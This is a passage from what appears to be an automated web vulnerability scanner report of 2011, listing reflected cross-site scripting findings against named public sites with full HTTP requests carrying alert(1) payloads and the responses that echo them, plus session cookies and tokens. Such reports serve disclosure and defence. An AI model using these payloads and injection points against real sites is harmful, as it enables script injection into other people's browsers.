Content-Type: text/html; charset=utf-8
Set-Cookie: JSESSIONID=rTgXMMJ19hpxRmQBeHTZpBSHLmdhQwpUS9D079bkV7zEURAZjdB9!865718048; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close


<!-- optional parameters
cb            : leave blank to hide logo, or pass in appropriate cb value
topmargin        - default is 20
leftmargin        
...[SNIP]...
<input type="hidden" name="key" value="453849B62CAB589517473EC368BF9542954f9"><x style=x:expression(alert(1))>935c7211ee2">
...[SNIP]...

3.92. https://event.on24.com/eventRegistration/EventLobbyServlet [partnerref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://event.on24.com
Path:   /eventRegistration/EventLobbyServlet

Request

GET /eventRegistration/EventLobbyServlet?target=registration.jsp&eventid=274282&sessionid=1&key=453849B62CAB589517473EC368BF9542&partnerref=ocom99c8f"><x%20style%3dx%3aexpression(alert(1))>81a40639315&sourcepage=register HTTP/1.1
Host: event.on24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:08 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: JSESSIONID=7cDI022cgrDsLBgCWczqE6wL9UAd4cjBPhMG2cmQDAsmDcV7RZYq!-1586332666; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close


<!-- optional parameters
cb            : leave blank to hide logo, or pass in appropriate cb value
topmargin        - default is 20
leftmargin        
...[SNIP]...
<input type="hidden" name="partnerref" value="ocom99c8f"><x style=x:expression(alert(1))>81a40639315">
...[SNIP]...

3.93. https://event.on24.com/eventRegistration/EventLobbyServlet [sourcepage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://event.on24.com
Path:   /eventRegistration/EventLobbyServlet

Request

GET /eventRegistration/EventLobbyServlet?target=registration.jsp&eventid=274282&sessionid=1&key=453849B62CAB589517473EC368BF9542&partnerref=ocom&sourcepage=registerab0db"><x%20style%3dx%3aexpression(alert(1))>113da7be2a3 HTTP/1.1
Host: event.on24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:17 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: JSESSIONID=62BqOkDMbxlMQz6LJa9JVd0qcMfDA1sqzBfibypGJraqoBW2Rf32!-1281997819; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close


<!-- optional parameters
cb            : leave blank to hide logo, or pass in appropriate cb value
topmargin        - default is 20
leftmargin        
...[SNIP]...
<input type="hidden" name="sourcepage" value="registerab0db"><x style=x:expression(alert(1))>113da7be2a3">
...[SNIP]...

3.94. http://fonts.googleapis.com/css [family parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.googleapis.com
Path:   /css

Request

GET /css?family=Droid+Sansdf90e<script>alert(1)</script>fe1972324d9 HTTP/1.1
Host: fonts.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www.ubermedia.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=UTF-8
Expires: Tue, 01 Mar 2011 13:16:19 GMT
Date: Tue, 01 Mar 2011 13:16:19 GMT
Cache-Control: private, max-age=86400
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 124

/* Droid Sansdf90e<script>alert(1)</script>fe1972324d9 (style: normal, weight: 400) is not available */
/* Not supported. */

3.95. http://init.zopim.com/register [mID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://init.zopim.com
Path:   /register

Request

GET /register?swfVer=2371&sk=4300947c68314c1251174fbec281db2c179656ed&ua=Mozilla%2F5%2E0%20%28Windows%3B%20U%3B%20Windows%20NT%206%2E1%3B%20en%2DUS%29%20AppleWebKit%2F534%2E13%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F9%2E0%2E597%2E98%20Safari%2F534%2E13&jsVer=0%2E4%2E0&mID=gLAMf6t1oQdRZ9pJbWZsb367xnR0jSnYeb22e<script>alert(1)</script>85708136ac4ac84a6&ref=http%3A%2F%2Fwww%2Ethedetroitbureau%2Ecom%2Fabout%2Dus%2F&tabId=%5Fflash%5F28853bf0ac29099fa00d4de19cf16898206ee90c&accountKey=zNGIkGNBzGwfX48wS7PchwQECOzEXOCT&ak=zNGIkGNBzGwfX48wS7PchwQECOzEXOCT&title=SEO%20Company%20USA%2C%20Michigan%20Web%20Design%20Services%2C%20Print%20Design%2C%20Flash%20Designing%2C%20Website%20design%20Companies%20Novi%2C%20E%2DCommerce%20Designer&url=http%3A%2F%2Fwww%2Esti%2Dcs%2Ecom%2F HTTP/1.1
Host: init.zopim.com
Proxy-Connection: keep-alive
Referer: http://zopim.com/swf/ZClientController.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 26 Feb 2011 20:42:18 GMT
Connection: keep-alive
Content-Length: 856

{"status": "offline", "__status": "ok", "name": "Visitor 210780399", "settings": {"chatbutton": {"position": "br", "theme": "bar"}, "greetings": {"away": {"window": "If you leave a question or comment
...[SNIP]...
Leave a message"}, "online": {"window": "Leave a question or comment and our agents will try to attend to you shortly =)", "bar": "Click here to chat"}}}, "machineID": "gLAMf6t1oQdRZ9pJbWZsb367xnR0jSnYeb22e<script>alert(1)</script>85708136ac4ac84a6", "nick": "visitor:210780399", "host": "lc03.zopim.com", "chat": {"members": [], "history": []}, "sid": "dFAqD1Ku9sANzup4iVjoZlanIFmiEk6o8QAQLwDi", "evt": 0, "email": ""}

3.96. http://klout.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://klout.com
Path:   /

Request

GET /?4facd"><script>alert(1)</script>8ccd61759dc=1 HTTP/1.1
Host: klout.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 02:08:00 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: arrival_cookie=946777d531528b2bf363616794e8adfbf3a48382837f53a4fa6b4e82003a0526974db48ea4f920f48c3b864757984edb3b2affcac264f40be0a749dbeee6dcccaf73dc8a679fa939bfca6210272326684357b4a1eec6cb8fc932d3ed6a0a8f40aa83542a500525ba2c586f0403ca529fbb9359262d905db3103667ed0ff5c3e30599aafa7bfc86e7c0fd20683ba2f913c9065481b6b566c4368205c4dd0bc103da93b18067281aab4fb9cb99d44f3d100e68f8c27b01888ce88b7dd97bc69e05959fa1266ed56e4a34e2cea6a70c75192c92045f9b17ffc4cb9100c5d8e2a351fe4def291c82267358d7e1b3c028fd8a722bac7b7ed3dd1bb45d7ab9bbdb4d42; expires=Wed, 02-Mar-2011 02:08:00 GMT; path=/; domain=.klout.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 20038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The Standard for
...[SNIP]...
<a id="signup_button" href="/auth/login?prev_page=/?4facd"><script>alert(1)</script>8ccd61759dc=1">
...[SNIP]...

3.97. http://klout.com/business [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://klout.com
Path:   /business

Request

GET /business?1d94c"><script>alert(1)</script>9392973573e=1 HTTP/1.1
Host: klout.com
Proxy-Connection: keep-alive
Referer: http://klout.com/blog/2011/02/from-hackathon-to-market-klout-for-chrome-beta/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1165085945-1298945312517; lcid=6f2ca7b2012e10009755722813cc6926; arrival_cookie=946777d531528b2bf363616794e8adfbf3a48382837f53a4fa6b4e82003a0526974db48ea4f920f48c3b864757984edb3b2affcac264f40be0a749dbeee6dcccaf73dc8a679fa939bfca6210272326684357b4a1eec6cb8fc932d3ed6a0a8f40aa83542a500525ba2c586f0403ca529fbb9359262d905db3103667ed0ff5c3e30599aafa7bfc86e7c0fd20683ba2f913c9065481b6b566c4368205c4dd0bc103da93b18067281aab4fb9cb99d44f3d100e68f8c27b01888ce88b7dd97bc69e05ad5c1e8b8aa5592d2dca061f375452281f4edf0b2a3f547401358d6de7475ee55f89ea64e19c36c98d7eb9c0988100b6bb485042d8a6367312664cd12069f3ed; __unam=c3eadea-12e6f5153b2-24b418a5-2; __utmz=261428178.1298985351.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=261428178.294036745.1298985351.1298985351.1298985351.1; __utmc=261428178; __utmb=261428178.1.10.1298985351; _chartbeat2=b0kvk660j5l2swh4

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 13:16:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 10252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Leverage the Pow
...[SNIP]...
<a href="/auth/login?prev_page=/business?1d94c"><script>alert(1)</script>9392973573e=1">
...[SNIP]...

3.98. http://klout.com/perks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://klout.com
Path:   /perks

Request

GET /perks?192f9"><script>alert(1)</script>26632aecda2=1 HTTP/1.1
Host: klout.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1165085945-1298945312517; lcid=6f2ca7b2012e10009755722813cc6926; arrival_cookie=946777d531528b2bf363616794e8adfbf3a48382837f53a4fa6b4e82003a0526974db48ea4f920f48c3b864757984edb3b2affcac264f40be0a749dbeee6dcccaf73dc8a679fa939bfca6210272326684357b4a1eec6cb8fc932d3ed6a0a8f40aa83542a500525ba2c586f0403ca529fbb9359262d905db3103667ed0ff5c3e30599aafa7bfc86e7c0fd20683ba2f913c9065481b6b566c4368205c4dd0bc103da93b18067281aab4fb9cb99d44f3d100e68f8c27b01888ce88b7dd97bc69e05ad5c1e8b8aa5592d2dca061f375452281f4edf0b2a3f547401358d6de7475ee55f89ea64e19c36c98d7eb9c0988100b6bb485042d8a6367312664cd12069f3ed; __unam=c3eadea-12e6f5153b2-24b418a5-2; __utmz=261428178.1298985351.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=261428178.294036745.1298985351.1298985351.1298985351.1; __utmc=261428178; __utmb=261428178.2.10.1298985351; _chartbeat2=b0kvk660j5l2swh4

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 13:19:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 8775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Klout Perks</tit
...[SNIP]...
<a href="/auth/login?prev_page=/perks?192f9"><script>alert(1)</script>26632aecda2=1">
...[SNIP]...

3.99. http://lfov.net/webrecorder/g/chimera.js [vid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lfov.net
Path:   /webrecorder/g/chimera.js

Request

GET /webrecorder/g/chimera.js?vid=nulla35d3<img%20src%3da%20onerror%3dalert(1)>e181c272a5 HTTP/1.1
Host: lfov.net
Proxy-Connection: keep-alive
Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: LOOPFUSE="nulla35d3<img src=a onerror=alert(1)>e181c272a5"; Expires=Sun, 26-Feb-2012 23:20:13 GMT
Content-Length: 62
Date: Sat, 26 Feb 2011 23:20:13 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/


_lf_vid='nulla35d3<img src=a onerror=alert(1)>e181c272a5';


3.100. https://login.silverlight.net/login/signin.aspx [returnurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Request

GET /login/signin.aspx?returnurl='%22+ns%3dalert(0x0000C7)+e7252%20style%3dx%3aexpression(alert(1))%2070580878a19a89e29&__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEyNjc1MTYyMTZkZO%2FafV0CJRP%2B2ILM8De2o6zEhcVm&__EVENTVALIDATION=%2FwEWAgLNm4PjCwL0iqHzAh9XOTMNktAsCvWQ8c3pqepo2pjW&ctl00%24mainMiddle%24loginForm%24Button2=Sign+In HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://login.silverlight.net/login/signin.aspx?returnurl='%22%20ns=alert(0x0000C7)%20
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: login.silverlight.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: omniID=1296343609010_276c_8196_7f44_eaa48f639648; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dfunctiononclick%252528%252529%25257BWebForm_DoPostBackWithOptions%252528newWebForm_PostBackOptions%252528%252522ctl00%252524mainMiddle%252524loginFo%2526oidt%253D2%2526ot%253DSUBMIT%2526oi%253D111; ASP.NET_SessionId=1v2hdzef02l3bh4551flgsaj

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 03:42:10 GMT
Content-Length: 15573


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   The Of
...[SNIP]...
<a href="https://login.silverlight.net/login/createuser.aspx?returnurl='" ns=alert(0x0000C7) e7252 style=x:expression(alert(1)) 70580878a19a89e29">
...[SNIP]...

3.101. https://login.silverlight.net/login/signin.aspx [returnurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Request

GET /login/signin.aspx?returnurl=%27%22%20ns=alert(0x0000C7)%20212e3%20style%3dx%3aexpression(alert(1))%2019a86531afa HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=hxt33s55a1yyxpqmorzegwfx; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 03:36:53 GMT
Content-Length: 13338


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<a href="https://login.silverlight.net/login/createuser.aspx?returnurl='" ns=alert(0x0000C7) 212e3 style=x:expression(alert(1)) 19a86531afa">
...[SNIP]...

3.102. http://odb.outbrain.com/utils/get [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Request

GET /utils/get?url=http%3A%2F%2Fioerror.us%2F2008%2F08%2F07%2Ffinal-pictures-from-duncannon-pa%2F&srcUrl=http%3A%2F%2Fioerror.us%2Ffeed%2F&callback=outbrain_rater.returnedOdbData(${json},0)c68ad<script>alert(1)</script>2366c191886&settings=true&recs=true&widgetJSId=NA&key=AYQHSUWJ8576&idx=0&version=34924&ref=&apv=false&rand=0.05641490779817104&sig=RKWTKL3v HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://ioerror.us/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=0e0ed3f9-f76f-4651-916d-b47532550304; _lvd2="p47tkLgO+tdtgtEB03I2oA=="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="; _lvs2="23sEltQMc/A="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1298762384782; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="7/zvT3TaXCJmXWbf0AnD2g=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sat, 24-Mar-2012 23:19:44 GMT; Path=/
Set-Cookie: _lvd2=p47tkLgO+tfGFc5yucapKUbdFkigiXwa; Domain=outbrain.com; Expires=Sat, 05-Mar-2011 12:07:44 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sat, 24-Mar-2012 23:19:44 GMT; Path=/
Set-Cookie: recs-74e9af2a662553ecf44292c20c4860dc=MvvIA5NJ5MbSeIuLhJLcUx6zCEztQUccKNVKISEnv3I+5qyasF+vvXwOWIXEdmAo; Domain=outbrain.com; Expires=Sat, 26-Feb-2011 23:24:44 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 23:19:44 GMT
Content-Length: 2920

outbrain_rater.returnedOdbData({'response':{'exec_time':15,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'183663854','req_id':'090d60a89850a65f1f1aea8c35cf961d'},'score':{'preferred
...[SNIP]...
<\/span>','raterMode':'none','timeCounter':'0|10000|0','defaultRecNumber':4}}},0)c68ad<script>alert(1)</script>2366c191886

3.103. http://plancast.com/p/3zbp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://plancast.com
Path:   /p/3zbp

Request

GET /p/3zbp720bc"><script>alert(1)</script>445c1a2e4e3 HTTP/1.1
Host: plancast.com
Proxy-Connection: keep-alive
Referer: http://klout.com/blog/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.32
Date: Tue, 01 Mar 2011 14:12:30 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Set-Cookie: plancast=e909fb2ae059f20da24d8f3538d39450; path=/
Content-Length: 19150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS feed for this page" href="http://plancast.com/p/3zbp720bc"><script>alert(1)</script>445c1a2e4e3?feed=rss" />
...[SNIP]...

3.104. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Request

GET /gampad/ads?correlator=1298985737807&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&eid=32942002&client=ca-pub-7688935593152794&slotname=BlueKai-125x125-20117b7aa<script>alert(1)</script>95b1e7bb03c&page_slots=BlueKai-125x125-2011&cookie_enabled=1&url=http%3A%2F%2Fwww.adexchanger.com%2Femail%2Fliveintent%2F&ref=http%3A%2F%2Fliveintent.com%2Fcompany.php&lmt=1299007340&dt=1298985740396&cc=4&biw=1100&bih=939&ifi=1&adk=3739325169&u_tz=-360&u_his=5&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.2.154&gads=v2&ga_vid=896767388.1298985741&ga_sid=1298985741&ga_hid=922508149 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.adexchanger.com/email/liveintent/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 01 Mar 2011 13:23:38 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 1449

GA_googleSetAdContentsBySlotForSync({"BlueKai-125x125-20117b7aa<script>alert(1)</script>95b1e7bb03c":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f
...[SNIP]...

3.105. http://rapportive.com/stylesheets/jquery.fancybox-1.3.1.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rapportive.com
Path:   /stylesheets/jquery.fancybox-1.3.1.css

Request

GET /stylesheets/jquery.fancybox-1.3.1.css31665<script>alert(1)</script>087e397004e?4a4d1d85 HTTP/1.1
Host: rapportive.com
Proxy-Connection: keep-alive
Referer: http://rapportive.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _relascale_session=BAh7BjoPc2Vzc2lvbl9pZCIlM2ZiYzQ4Nzc0M2IwYzA1NTViM2UzMmU0Y2RlZjE5ZTI%3D--b39993fe2a728d46321dea2967c06a6b44ac819c

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Tue, 01 Mar 2011 13:16:13 GMT
Content-Type: text/plain
Connection: keep-alive
Content-Length: 96
X-Varnish: 2027515278
Age: 0
Via: 1.1 varnish

File not found: /stylesheets/jquery.fancybox-1.3.1.css31665<script>alert(1)</script>087e397004e

3.106. http://rapportive.com/stylesheets/website_screen.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rapportive.com
Path:   /stylesheets/website_screen.css

Request

GET /stylesheets/website_screen.css10865<script>alert(1)</script>7392b710d0?57daf1f9 HTTP/1.1
Host: rapportive.com
Proxy-Connection: keep-alive
Referer: http://rapportive.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _relascale_session=BAh7BjoPc2Vzc2lvbl9pZCIlM2ZiYzQ4Nzc0M2IwYzA1NTViM2UzMmU0Y2RlZjE5ZTI%3D--b39993fe2a728d46321dea2967c06a6b44ac819c

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Tue, 01 Mar 2011 13:16:14 GMT
Content-Type: text/plain
Connection: keep-alive
Content-Length: 88
X-Varnish: 2027515420
Age: 0
Via: 1.1 varnish

File not found: /stylesheets/website_screen.css10865<script>alert(1)</script>7392b710d0

3.107. https://shop.winamp.com/DRHM/store [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://shop.winamp.com
Path:   /DRHM/store

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /DRHM/store?Action=DisplayProductInterstitialDetailsPage&SiteID=winamp&Locale=en_US&ThemeID=1279300&productID=103591500&94384-->4321560c01e=1 HTTP/1.1
Host: shop.winamp.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
